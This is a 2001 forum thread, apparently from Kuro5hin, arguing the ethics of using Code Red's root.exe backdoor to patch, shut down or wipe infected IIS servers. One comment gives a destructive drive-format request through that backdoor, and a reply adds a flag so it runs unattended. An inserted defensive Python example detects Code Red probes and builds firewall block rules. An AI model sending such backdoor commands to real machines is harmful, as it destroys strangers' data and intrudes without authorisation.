- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Hrm (3.00 / 1) (#43)
by RangerBob on Wed Aug 08, 2001 at 11:53:58 AM EST

Millions of dollars in minutes? Wow, I guess I need to quit what I'm doing and go to an ISP since that sounds even better than being a Psychic Friend :) And no, I don't think I'd go to jail for being the victim of a DDOS. I'd really like to see your example for that one because I don't quite remember seeing someone go to jail for being at the receiving end of a DDOS. And, if it serves the default IIS page, it'd have to be running IIS. My reply was half in jest, since you acted like a machine not running IIS could still be infected by an IIS worm.

And even after all of this aggression, and weird examples like the above, you still haven't answered the point: don't you think it's a double standard to bitch about someone else's worm that cracks machines while writing your own to also crack machines, even if it's for "noble" purposes?

[ Parent ]
Yes... there is a double standard ! (3.00 / 2) (#49)
by neuneu2K on Wed Aug 08, 2001 at 12:50:50 PM EST

That is because it is not the same thing:

  • "My" script only "attacks" machines who are participating in an illegal action
  • My script does not use the "attacked" machine to propagate: it does not use resources of the machine, does not potentially cost money to the owner of the machine and does not make him an accomplice in an illegal action
  • My script does not augment the number of people with administrative right to the machine, it restores the administrative rights to the ones given by the owner

If you think that big ISPs have it easy on the cost of international links... well I am not stopping you from being an ISP :-)


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
wasted bandwidth (4.25 / 4) (#20)
by klamath on Wed Aug 08, 2001 at 09:31:03 AM EST

So...our solution is to write something that cracks into the machines and wastes bandwidth trying to find them???
No -- at last count, more than 1 thousand unique hosts have tried to attack my Apache server using the Code Red exploit. If I had set up a script to connect back and patch the infected server, not only would those 1,000+ servers be fixed, but they would not have the opportunity to infect other hosts, and so on. And because the fixed hosts will no longer be scanning (and on the 20th, DOS'ing), a lot of bandwidth will be saved. The actual bandwidth used by connecting back and shutting down the attacker is minuscule.

[ Parent ]
Continuing for a while... (none / 0) (#63)
by topham on Wed Aug 08, 2001 at 02:33:13 PM EST

As long as this damn virus continues my network connection is threatened. I rely on it for work.

And there is nothing I can do to change that.

I'm not happy about the current situation. (And no, finding a different provider doesn't solve the problem either, all of them have it to some extent.)

[ Parent ]

dont look for them, wait for them to look for you (none / 0) (#67)
by Ricdude on Wed Aug 08, 2001 at 02:51:01 PM EST

Add a cron job that checks your access_log (or equivalent) for infection attempts, and use that as your list of target machines to "vaccinate". No additional waste of bandwidth in that technique.

Someone could even post the instructions on how to set up a "clinic" on a webserver (i.e. the necessary default.ida and supporting scripts) for others to use. The writer shouldn't be liable for any uses, any more than someone who finds a root exploit in a program is liable for damages due to that exploit.


[ Parent ]
Uh.. (none / 0) (#89)
by Inoshiro on Wed Aug 08, 2001 at 06:36:25 PM EST

That's what I did, when I wrote it in my diary. That's what inspired the neuneu2K guy to write a story. My "fix" hooks into default.ida requests in Apache and turns around and tries to shut down the remote machine.

But don't feel too bad. More people than you felt the need to post without bothering to read the article as well as the supporting material linked.



--
[ イノシロ ]
[ Parent ]
*smack* duh... (none / 0) (#104)
by Ricdude on Wed Aug 08, 2001 at 10:33:16 PM EST

Sorry, I was on the wrong wavelength when I started the reply. Knee deep in a recompile at work, not the best place for design work. =) Call it a design defect. The proposed solutions are pretty cool. Not to mention that handy root.exe that's left around; I bet you could do a lot of useful things with that...

[ Parent ]
Hehe (none / 0) (#120)
by Inoshiro on Thu Aug 09, 2001 at 02:09:28 PM EST

"The proposed solutions are pretty cool. Not to mention that handy root.exe that's left around; I bet you could do a lot of useful things with that..."

Which is why this was posted, so smart people like you could come up with solutions and post them :)



--
[ イノシロ ]
[ Parent ]
Code Blue? (3.57 / 7) (#21)
by apocryphile on Wed Aug 08, 2001 at 09:52:50 AM EST

I like this idea. I don't have the skills to participate, but I do have a suggestion to take it a little further.

Would it be feasible to make a script for Win2K systems that watches for Code Red connection attempts, does the things listed above to the offending server, and then copies itself to the offending server?

"If a little knowledge is a dangerous thing, I may just be the deadliest man alive."
Apocryphile

Nope (3.00 / 2) (#23)
by neuneu2K on Wed Aug 08, 2001 at 10:15:59 AM EST

Well, it is feasible of course...
but I do not think that I would go as far as "infecting" a machine, even for good.

And if a good script is written, even if only a handful of servers host it, it would be sufficient to greatly reduce the propagation of Code Red and the danger of having "remotely administrable" machines hanging around by the thousands !

I really like the name - code blue - !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Re: Code Blue (4.00 / 2) (#31)
by apocryphile on Wed Aug 08, 2001 at 11:00:29 AM EST

I understand your reluctance to spread any sort of infection to other computers, but I think that there are some good arguments for this (yeah, maybe I should have put these in my first comment).
  • Ideally, you write the script so that it allows no further connections or administration from the outside world. It still attempts to alert the owner of the box, and you can add instructions on how to remove this script (heck, you can include a script that will remove itself and this script when run). This should somewhat ameliorate the concerns about infecting someone else's machine. The machine was already infected, you're just replacing a malign infection with a benign one, and giving them the method to remove the infection altogether.
  • Someone else is going to think of this for less benign purposes. If someone does the same thing, but leaves themselves a back door, they will soon own almost all the Code Red machines out there. Why is this so bad? There is a good chance no one is going to notice the counter infection, since it will only affect people who are already infected with Code Red, and thus probably aren't paying attention anyway, or have some nasty agenda of their own. The only sign to everyone else would be that the number of Code Red attacks would drop off. If they wanted to avoid even this, they could just leave the normal Code Red in place.
These may not be sufficient arguments. I certainly won't try to convince anyone to do this if they think it's wrong. I just shudder at the thought of the havoc someone could wreak using the huge number of Code Red infected servers out there. I also don't think that you'll get enough people running the non-infectious script to have a significant impact on the number of infected servers.

---If a little knowledge is a dangerous thing, I may be the deadliest man alive.
------Apocryphile

[ Parent ]

I understand your reasons... (2.00 / 1) (#36)
by neuneu2K on Wed Aug 08, 2001 at 11:16:27 AM EST

But, patching without the knowledge and agreement of the owner is illegal. I am ready to break the law to "repair".
I am not ready to make other people unknowingly break the law by spreading my patch.

But, I agree, if it really "added value" to code blue, I would do it. A simple script seems enough to me to stop Code Red so I will stop there.
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Pragmatism (4.00 / 1) (#41)
by apocryphile on Wed Aug 08, 2001 at 11:37:05 AM EST

I guess I lean more toward pragmatism. How about this as a compromise.

Drop the script, and instructions for running it (along with a warning of the possible legal ramifications) on the machine, but don't run it. Sure, it wouldn't be wise of them to run a script received anonymously, but what do you want to bet that lots will? Ideally, you include a well commented version of the script, so the more technically savvy can verify its operation.

This changes it from an opt-out, to an opt-in, and should address your concerns, while still helping the spread of the countermeasure.

---If a little knowledge is a dangerous thing, I may be the most dangerous man alive.
-----Apocryphile

[ Parent ]

IANAL but (3.00 / 1) (#48)
by kezgin on Wed Aug 08, 2001 at 12:15:58 PM EST

I am not ready to make other people unknowingly break the law by spreading my patch.

Would other people that unknowingly spread the counter infection be breaking the law? I mean, if that were the case, everyone that helped spread CRI/II, or any virus/worm, would be breaking laws as well.

[ Parent ]
If only we were so lucky. (none / 0) (#83)
by Inoshiro on Wed Aug 08, 2001 at 05:34:39 PM EST

If we had good anti-lemon laws, and laws against improperly maintained systems (and/or licensing for systems admins on the internet), we would have much better experiences. ISPs would firewall off their subscribers, and the silly net share viruses would not cross-pollinate ISPs. Secretaries would not be administrating the company website. And maybe, just maybe, those lazy-ass people who are responsible for CR1/2 on their real websites (opposed to the CM lusers) would keep up on patches better.

But we aren't so lucky, and we have to fight back. Because I'm mad as hell and not going to take this abuse from stupid admins any more.



--
[ イノシロ ]
[ Parent ]
Real purpose of Code Red (none / 0) (#155)
by mrogers on Thu Aug 16, 2001 at 10:05:57 AM EST

There is a good chance no one is going to notice the counter infection, since it will only affect people who are already infected with Code Red, and thus probably aren't paying attention anyway

This raises the interesting possibility that the real purpose of Code Red was to identify unattended machines, and all the 'Hacked by Chinese' and whitehouse.gov stuff was just a smokescreen. Or is that too close to being a conspiracy theory? ;-)

[ Parent ]

Evil related idea (3.00 / 1) (#35)
by dennis on Wed Aug 08, 2001 at 11:11:55 AM EST

How to anonymously root a quarter million machines overnight

Interesting idea though. If someone were to make a CodeRed-eating worm, it would greatly reduce the incidence of CodeRed infection, while not affecting servers that have already been patched. Don't know if it's a good idea, but it's clear that just expecting people to patch their systems isn't fixing the problem, and it's only going to get worse. With two competing worms you get a classic predator-prey ecosystem, instead of one growing exponentially like rabbits in Australia. I wouldn't want to be the test case in court but long-term it might be the only solution.

Of course, if these competing worms start to evolve on their own, we might have a problem....

[ Parent ]

Code Red II survives reboot (4.33 / 12) (#22)
by swiftone on Wed Aug 08, 2001 at 10:09:20 AM EST

Note that Code Red II (see http://www.incidents.org/react/code_redII.php) survives a reboot. Also, rebooting a Code Red I server doesn't patch it, so it will simply get reinfected.

So if one is truly following this article's suggestion to neuter compromised servers, rebooting is a poor choice.

re: Code Red II survives reboot (4.00 / 1) (#73)
by ignatiusst on Wed Aug 08, 2001 at 04:31:06 PM EST

Thanks for the link to this article! My server was hit Saturday, and even though I have applied the patch, I have still refused to re-connect to the internet until I reformat the hard drive.

My clients have been screaming bloody murder (fortunately, I am not an ISP provider, or I wouldn't have any clients by now - or, I would have them right up until the time a hacker got in through the back door and rooted my server), and my partner has been ready to blow his top. I have tried again and again to explain the whole concept of backdoors, trojans, and the server's vulnerability, but I am either not convincing enough or they are just too damn obtuse. This article spells out everything I have been trying to say for the past three days, except it does it clearly and with (assumedly) greater authority than I can command.

Once again, thanks!

When a true genius appears in the world, you may know him by this sign, that the dunces are all in confederacy against him. -- Jonathan Swift
[ Parent ]

shortage of ethics (3.58 / 12) (#28)
by Speare on Wed Aug 08, 2001 at 10:54:10 AM EST

Why do schools neglect an ethics curriculum?

Your solutions should not affect the state of the infected machines. Even telling them that their machine is infected is over the line, if you're using their machine to do it.

If you're being hampered by Code Red hits, make a script to firewall off every infected computer for a day. Allow those firewalls to expire, and if they're still infected, they'll get blocked again.

    "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin

Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.
 
[ e d @ h a l l e y . c c ]
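The log-driven approach that Ricdude (#67) and Speare (#28) each describe, written up as an added example that is not code from the thread or from Inoshiro's diary script: it reads Apache access_log lines, picks out the Code Red default.ida request shape, counts probing sources, and keeps a block list that expires after a day so a host that has since been cleaned is unblocked automatically, while one still probing is blocked again on the next run. It does nothing to the remote host; the only action is a local firewall drop. The sample log lines (RFC 5737 documentation addresses), SAMPLE_NOW, the 20-character padding threshold and all function names are assumptions made for this example.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample access_log lines (documentation addresses, not real
# hosts). Three entries carry the Code Red request shape: a GET for
# /default.ida? followed by a long run of padding bytes (N for Code Red I,
# X for Code Red II) and %u escapes. One entry is an ordinary page hit.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Aug/2001:09:15:19 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 276
198.51.100.7 - - [08/Aug/2001:09:16:02 -0400] "GET /index.html HTTP/1.1" 200 1532
203.0.113.5 - - [08/Aug/2001:09:17:44 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 276
192.0.2.10 - - [08/Aug/2001:09:18:01 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 276
"""

# Constructed "current time" for the demo run (a real cron job would use
# datetime.now(timezone.utc)); kept as a constant so the result is reproducible.
SAMPLE_NOW = datetime(2001, 8, 8, 14, 0, tzinfo=timezone.utc)
BLOCK_TTL = timedelta(days=1)

# Common Log Format: client, ident, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Both worm variants hit /default.ida with a long padding run in the query
# string. The real payload is far longer than 20 characters; 20 is an
# assumed, conservative floor so that short hand-typed URLs do not match.
PROBE_RE = re.compile(r"^/default\.ida\?[NX]{20,}")


def parse_line(line):
    """Return the fields of one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_code_red_probe(path):
    """True when the request path carries the Code Red default.ida signature."""
    return PROBE_RE.match(path) is not None


def find_probe_sources(log_text):
    """Map each client IP that sent a Code Red probe to the number of probes seen."""
    counts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and is_code_red_probe(rec["path"]):
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


def update_blocks(blocks, sources, now, ttl=BLOCK_TTL):
    """Apply the block-for-a-day policy and return the new block list.

    blocks maps IP -> expiry time. Entries whose expiry has passed are dropped,
    so a host that has been cleaned stops being blocked on its own; a host that
    keeps probing after expiry simply gets a fresh entry on the next run.
    """
    live = {ip: exp for ip, exp in blocks.items() if exp > now}
    for ip in sources:
        if ip not in live:
            live[ip] = now + ttl
    return live


def render_rules(blocks):
    """Render the block list as iptables commands, one per blocked host."""
    return [
        f"iptables -I INPUT -s {ip} -p tcp --dport 80 -j DROP"
        for ip in sorted(blocks)
    ]


if __name__ == "__main__":
    sources = find_probe_sources(SAMPLE_LOG)
    for ip, n in sorted(sources.items()):
        print(f"{ip}: {n} Code Red probe(s)")
    for rule in render_rules(update_blocks({}, sources, SAMPLE_NOW)):
        print(rule)
```

Run from cron, the job would read the real access_log, load the previous run's block list, call update_blocks with the current time, and apply the rendered rules (removing rules for entries that have expired). Dropping the probes rather than answering them also addresses neuneu2K's point in #34 that even a 404 response is bandwidth spent on the worm.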

two points: (3.66 / 6) (#34)
by neuneu2K on Wed Aug 08, 2001 at 11:08:15 AM EST

  • Firewalling their machines would not stop them from being infected, would not stop the packets from spouting, would not stop any DDoS. But I agree, if you do not try to stop them, at least do not respond to them (even with a 404)
  • I am NOT giving away any liberty ! I have not proposed to make having an infected machine illegal. I think that, apart maybe from the author of the worm, nobody has chosen to run the worm !
    In fact, I am sure that most of the users would be glad to have their machine disinfected.

Preservation of Freedom stops me from doing -harm-, not from preventing harm.

If you love liberty, shouldn't you prefer the Internet to be technically regulated from the base than politically regulated from the top, because if we don't stop this worm and it does damage, it will be a scapegoat for governments to regulate the fact of running a server.


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Ethics classes (3.25 / 4) (#44)
by fluffy grue on Wed Aug 08, 2001 at 12:00:49 PM EST

The problem isn't a lack of ethics classes, the problem is the subject matter. All that NMSU CS's ethics class ends up saying is, "There is no privacy anymore, and IP should be free. Oh, and there's too much pornography online."
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

Ethics (3.00 / 1) (#54)
by Abstraction on Wed Aug 08, 2001 at 01:28:50 PM EST

Why do schools neglect an ethics curriculum?

Mine didn't, as I'm sure others didn't also. It's just that the borderline between ethical and not ethical can sometimes be hard to see. That and some people just don't have any ethics to begin with.

[ Parent ]
You're right, of course... (2.00 / 1) (#64)
by darthaggie on Wed Aug 08, 2001 at 02:39:56 PM EST

Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

Agreed. But their ISP should demand they fix it asap, and if it isn't fixed in a reasonable amount of time, disconnect them completely.

Yes, that's rash, but then again leaving known network holes on the 'net is also a violation of liberty.

I am BOFH. Resistance is futile. Your network will be assimilated.
[ Parent ]

The Ethics of Hacking (4.50 / 2) (#109)
by BlckKnght on Thu Aug 09, 2001 at 04:47:39 AM EST

Why do schools neglect an ethics curriculum?
I'm going to rise to this flame bait and stand up for everyone who thinks that there is an ethical justification for this kind of hacking (to repair a previous infection). I doubt I'm the best qualified to give you a rundown on hacker ethics but since no one else has tried to refute your comment I'll do my best.
Your solutions should not affect the state of the infected machines. Even telling them that their machine is infected is over the line, if you're using their machine to do it.
First, may I ask why it is "over the line"? Do you think it is an invasion of privacy? A theft of computer resources? What is the problem? I'll accept that it is probably illegal. I'll take that risk for the good of the internet.

Your quotation of Ben Franklin is totally irrelevant. It might be if the cry was for the government to step in and secure all computers (as was proposed here). It's not. The idea is for you and I, as part of the Society of the internet, to do something about this specific problem.

It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.
Code Red II is not a small problem like the first Code Red. This worm is installing a backdoor on hundreds of thousands of machines. These compromised machines, even after they stop scanning, can be used later by malicious persons to do a wide variety of things (DDoS is an obvious application).

Furthermore, it's hard (perhaps impossible) for the admin of a compromised system to know that this has not already happened! Until they reformat their drive and reinstall everything, they are a risk to everyone else online (this is in fact the recommendation in the report here).

I'll go out on a limb and say that I think it would be ethical, though in extremely poor taste (and legal judgement), to respond by doing the reformatting yourself, via the backdoor. Far better yet would be to disable the backdoor as best you can and notify the admin. If that is also too invasive for you, still try to notify the admin through whatever channels you can. Don't do nothing, just to respect the "rights" of the infected host.

There are some times where it is ethical to ignore the "rights" of individuals (and some are actually legal too). The actions proposed in this story are not violations of the rights of the owners of infected web servers. Those people are a danger to the people of the internet, just as much as a person shouting fire in a theater is a danger to those around him. As important as they are, individuals' rights should not prevent society from doing the Right Thing.

-- 
Error: .signature: No such file or directory


[ Parent ]
Using their machine (3.00 / 1) (#112)
by Elendur on Thu Aug 09, 2001 at 06:11:14 AM EST

"Even telling them that their machine is infected is over the line, if you're using their machine to do it. "

Yes, you're using their machine to do that, but consider what that really means. If I send them an email I am using their machine when they read it. If I have a win2k box on the same network and do a net send, it uses their machine. Any interaction at all between two computers uses both systems even though it only requires one to initiate it. Connecting to their box with a script and doing a net send to tell them that they're infected is no worse than any of these perfectly legitimate ways of using their machine.

[ Parent ]
Format the damn things. (1.50 / 14) (#29)
by stormie on Wed Aug 08, 2001 at 10:57:15 AM EST

* should NOT format the drive of the poor S.O.B. or otherwise destroy important data

Why the hell not? These machines breed out of control and consume the bandwidth that other people are paying for. Formatting them is like shooting a feral rabbit or something. Sure, there's a legal risk here, but if you get probed by a Code Red infected server in Taiwan or somewhere, I'm all for a "GET /scripts/root.exe?/c+format+/u+c:" or whatever it takes to put them out of our misery.



left off one (4.50 / 2) (#55)
by h2odragon on Wed Aug 08, 2001 at 01:31:21 PM EST

"/autotest"... It wouldn't do to have the thing hang up asking for verification....

[ Parent ]
You are a fucking asshole (5.00 / 3) (#81)
by delmoi on Wed Aug 08, 2001 at 05:00:02 PM EST

Yeh, if someone gets their machine hacked and causes you a minor annoyance they definitely deserve to have anything and everything on their computer destroyed. I mean, fuck, mp3s, their own writing and pictures, years of email. No data could possibly be worth those hundreds of extra log entries on your machine!
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
More harm then good. (3.50 / 2) (#56)
by PlutoniumHigh on Wed Aug 08, 2001 at 01:33:27 PM EST

All this does is promote laziness. I'm sure that there are more than enough admins that use IIS that have been infected by these types of exploits several times over. If a business finds that their website has been down 1/2 of the time because the admin doesn't know how to apply a security patch, he/she would probably be reprimanded or fired.

If a script fixes the problem for them, what good does it do in the long run? The business knows no different and does not realise that their admin may be a moron. The admin will not learn from their mistakes. More importantly, people will not realize that the software they use may be substandard.

I prefer not to use IIS, but there are a few occasions when I have to. It is not that hard to prevent these types of infections. People (as well as the software makers) all have to learn how to prevent it. Sometimes, to prevent mistakes, you first must fall flat on your face.

not all IIS users are admin ! (3.00 / 1) (#57)
by neuneu2K on Wed Aug 08, 2001 at 01:36:45 PM EST

Professional use of IIS is not the problem here, most of the times, if there is an admin, servers will be patched !

The owned machines are mostly cable or DSL guys who installed Win2k server (because that is the warezd version they found)
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Re:not all IIS users are admin ! (none / 0) (#59)
by PlutoniumHigh on Wed Aug 08, 2001 at 01:54:16 PM EST

I agree. Most admins do their job. Most infections are probably Cable/DSL. I don't know for sure, but I'll take your word for it. (if you have a reference for this, I'd like to see it out of curiosity :) )

Even so, it's education and awareness for the user. If someone gets booted off their ISP for excessive traffic because they were running an infected 2000 server; I say too bad for them. That's how people learn the most, by those types of failures. Chances are, they won't run 2000 server again or they will be more willing and curious to learn about servers and security in general. These types of "white hat" scripts may fix an exploit, but they do not really solve the problem.


[ Parent ]
I've got a cable modem (none / 0) (#61)
by weirdling on Wed Aug 08, 2001 at 02:12:37 PM EST

Those idiotic machines are trying to hack my Mac. My cable modem is railed most of the time with worm-related traffic from the luser win machines.

I'm not doing this again; last time no one believed it.
[ Parent ]
The servers I've gotten Code Red 1 and 2 hits from (none / 0) (#65)
by fluffy grue on Wed Aug 08, 2001 at 02:41:14 PM EST

Ignoring the few dozen which have no PTR responses (about half of which are on 128.x.x.x addresses and are therefore at a university, and are probably unsecured workstations), I got hits from the following hosts:

lsanca1-ar11-051-165.lsanca1.dsl.gtei.net
c998455-a.plstn1.sfba.home.com
modemcable024.131-203-24.que.mc.videotron.ca
user-24-214-44-5.knology.net
user-24-214-72-23.knology.net
cr982552-a.ym1.on.wave.home.com
cx252934-a.chnd1.az.home.com
framed-user-249.62.151.65.ya.com
L1508P26.dipool.highway.telekom.at
cblmdm63-166-32-177.buckeye-express.com
1Cust218.tnt1.nashua.nh.da.uu.net
ip-63-250-46-253.nas.dsl.fcc.net
1Cust51.tnt1.las-cruces.nm.da.uu.net
nldc2-175.inav.net
adsl-81-198-127.jax.bellsouth.net
bozeman-66.109.133.23.bzn.montana.com
user-112uotd.biz.mindspring.com
voicemedicaldata.com
pc-marbock.NMSU.Edu
pc-socwork26.NMSU.Edu
pc-biscuit.nmsu.edu
rmcsdev.usc.edu
dial164.CC.Lehigh.EDU
DSP2.CC.CMU.EDU
dhcp-227-68.gsm.uci.edu
ants.poly.edu
host2d92.alcatel.com
ev-245-7.Berkeley.EDU
hybel156.grm.hia.no
d8hs4601.seas.columbia.edu
oboeguy.ieor.columbia.edu
chem-240.umd.edu
wizard.ee.ucla.edu
db155.csie.ncku.edu.tw
cdc3.cyberia.net.lb
4-230.corp.sonera-xs.nl
cafe-server.bbt.ufv.br
200-184-153-2.pib.com.br
ciclope.icomex.com.br
win95.vipbbs.com
adsl-204-1-124-138.indi.se.verio.net
dialup210.alliancelink.com
treed-pc1.customer.jump.net
info.tokuko.co.jp
211-232-179-194.panworldnet.com
216-21-141-185.ip.van.radiant.net
bn03655b33wj.bc.hsia.telus.net
DeForestSD-210.nat.wiscnet.net

Notice how most of these are either dialup/user connections or are workstations at educational institutions. The only "real" server I see on that list is voicemedicaldata.com, and that server is currently unresponsive.
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

almost all are home users (4.00 / 1) (#70)
by Garc on Wed Aug 08, 2001 at 03:37:32 PM EST

I have a longer list of machines that have tried to infect my linux box (probably around 1000), and maybe 3 of them aren't on dsl, cable modem or edu.

See for yourself.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

almost all are home users (none / 0) (#149)
by ncc74656 on Sat Aug 11, 2001 at 08:05:10 PM EST

Of 1515 hosts to date, only 195 are explicitly identified as other hosts on lvcm.com (this doesn't count those who have other domain names for their systems that no longer show up as cmxxx.yyy.234.24.lvcm.com in my logs). Of 4021 attacks, though, those 195 hosts account for 2315 attacks.

An up-to-the-second listing of attacks I've fielded is here.

(lvcm.com, BTW, is Cox Express in Las Vegas, the cable-modem provider I use.)

[ Parent ]

this will not work (1.50 / 2) (#58)
by trevize talker on Wed Aug 08, 2001 at 01:38:22 PM EST

view the computer as a portal/terminal to a distributed computing landscapes. then a worm can be hunted and destroyed effectively.

This is such a bad idea... (3.00 / 6) (#62)
by yosemite on Wed Aug 08, 2001 at 02:27:20 PM EST

Imagine the following scenario:
  • The server for some $BIGMONEY site is infected (say, a site that does $BIGNUM dollars worth of business every day).
  • The virus on that server contacts your machine.
  • Your "retaliatory strike" is invoked, and modifies the $BIGMONEY system -- congratulations! You've modified a system you don't own without permission!
  • Uh-oh: the ecommerce software running on the $BIGMONEY servers is incompatible with Microsoft's patch (remember "DOS ain't done 'till Lotus don't run"?)
  • The $BIGMONEY lawyers track you down and sue you for damages (lost income, damage to reputation, court costs, etc).
  • Your reputation as a programmer is ruined, you lose everything you own, and you spend a few years in the gray-bar hotel.
Even if all you ever touch is home systems hooked up to cable and DSL, you're still asking for trouble. Most people (even among nominally computer literates) only have the vaguest notion of what Code Red is, and no idea what distinguishes Code Red from SirCam from a DDoS attack. And they're not going to see much difference between a "retaliation" and the original infection.

--
[Signature redacted]

Who are you kidding? (1.00 / 1) (#68)
by impto on Wed Aug 08, 2001 at 02:57:12 PM EST

First of all, in the unlikely event that your "$BIGMONEY" scheme were to play out, it has already been pointed out that the person who sent the cleaning script wasn't the one who initiated the action: the server requested a file and got it. That the file is a script that would prevent them from using up mass amounts of bandwidth and patch their server to take out backdoors set up in the system is beside the point.

Secondly, if the person/corporations involved are not capable of keeping their server software up to date and are completely clueless as to the existence of these exploits, then it is just as likely that they would not be able to attribute an incompatibility of an MS patch with a 5kb script that they also had no idea they were running. (Why you believe these people would somehow see the light and download the patch in the first place is beyond me.)

I guess what I'm getting at is that if they didn't know they were infected they would probably never figure out that they got immunized. And if they did, they would probably not have the knowledge/gumption/know-how to track down who did the disinfecting.

impto

[ Parent ]

Re: Who are you kidding? (none / 0) (#69)
by yosemite on Wed Aug 08, 2001 at 03:32:11 PM EST

it has already been pointed out that the person who sent the cleaning script wasn't the one who initiated the action that the server requested a file and got it.
Oh, come on. How does this even matter? Knowing of a rooted server does not give you the right to administrate it.
if they didn't know they were infected they would probably never figure out that they got immunized. And if they did, they would probably not have the knowledge/gumption/know-how to track down who did the disinfecting.
If something is wrong, having the opinion that you're unlikely to be caught doesn't make it less wrong (I realize this isn't a popular belief these days, but frankly I don't want to live in a world where anything is OK as long as you don't get caught).

Also, there's nothing like having your machine 0w3ned to light a fire under your butt. Even Metallica (or rather, the people their lawyers hired) could trace down Napster users downloading their songs when they decided they wanted to.



--
[Signature redacted]

[ Parent ]

This is why I hate the US. (none / 0) (#75)
by Inoshiro on Wed Aug 08, 2001 at 04:45:06 PM EST

If I were to step in and shut down the compromised system -- I'm helping. I'm lessening the exposure time of their compromised system, and I'm ensuring it does not compromise more. And since I'm doing it on demand, rather than using another worm, I'm not just replacing one problem with another.

So why do I go to jail? For the same reason that if I helped a person out of a burning wreck that exploded a few minutes after I got someone to safety, but they happened to end up paralyzed later (be it from the accident, or from what I had to do to get the person out of the wreck before it killed them), they can legally sue me in the US. Thankfully, Canada has good, federal Samaritan laws which protect people who intervene in situations like that and save lives. I think some states (Texas) also have them, but it's not universal.

I'm willing to take a stand against CR because it's a pesky annoyance. You might not be, but you're not taking the risk -- are you?



--
[ イノシロ ]
[ Parent ]
Context (4.00 / 1) (#82)
by yosemite on Wed Aug 08, 2001 at 05:29:41 PM EST

Thus spake Inoshiro:
If I were to step in, and shutdown the compromised system -- I'm helping.
If you did it without asking, you'd be a vigilante.

You might claim "self defense", but any action taken in self defense has to be in proportion to the harm threatened.

I'm willing to take a stand against CR because it's a pesky annoyance.
But see, that's my whole point -- CR isn't on the same level as someone trapped in a flaming crash -- it's just a pesky annoyance. And having someone post untested patches to your machine without your permission goes way beyond the level of "a pesky annoyance".

Now, I completely agree that everyone running an infected machine needs to either patch it or take it off the internet ASAP, and by force of law, if necessary. I just think that starting up the Vigilante Hax0rs of Justice is the absolute wrong way to deal with the situation.

--
[Signature redacted]

[ Parent ]

However. (none / 0) (#97)
by static on Wed Aug 08, 2001 at 08:44:08 PM EST

If all the reverse exploit did was shut down the offending server ("net stop iis" or whatever it is) then I could claim all I was doing was no more than stopping their broken machine from hassling mine.

But I can see your point, too. Thinking up an analogy, it would be like turning off your neighbour's TV because he has it way too loud - and won't get himself a hearing aid...

Wade.



[ Parent ]
One little fact ... (none / 0) (#138)
by kostya on Fri Aug 10, 2001 at 01:20:36 PM EST

But I can see your point, too. Thinking up an analogy, it would be like turning off your neighbour's TV because he has it way too loud - and won't get himself a hearing aid...

... without his permission.

Everyone keeps arguing about the severity of the problem, the innocence of the proposed solution--it has nothing to do with any of that. It all comes down to permission or authorization.

Under current U.S. laws and with the current legal climate towards "crackers", to use their machine, in any state of security or exploitation or whatever, without permission is illegal.

Frankly, I think there is good reason. Sure, everyone here thinks they're hot stuff, but what if we aren't? Have you worked for a corporate client? Their setups can be simple or just plain insane--a simple patch might break some kludge they set up to get IIS to work with their hamster-driven tape storage system where they have all their billing. I know I don't want some random joe messing with my home setup.

Drop them an email, give them a phone call, whatever--let them handle it. It's their box. If you want to be a good Samaritan, notify them and then offer your services if they don't know what to do.



----
Veritas otium parit. --Terence
[ Parent ]
not exactly (4.00 / 1) (#85)
by rebelcool on Wed Aug 08, 2001 at 06:13:27 PM EST

I found one source dated 1985 that said 'over 36 states' have good Samaritan laws (try looking on Google... you'll find tons of different resources but no hard facts). I think you'd be hard pressed to find a state that DIDN'T have some kind of good Samaritan law.

Every state I've lived in (Texas and Utah so far) has had the laws.

Some even go so far as to make you guilty of a misdemeanor if you DO NOT help a bystander.

COG. Build your own community. Free, easy, powerful. Demo site
[ Parent ]

Well. (none / 0) (#91)
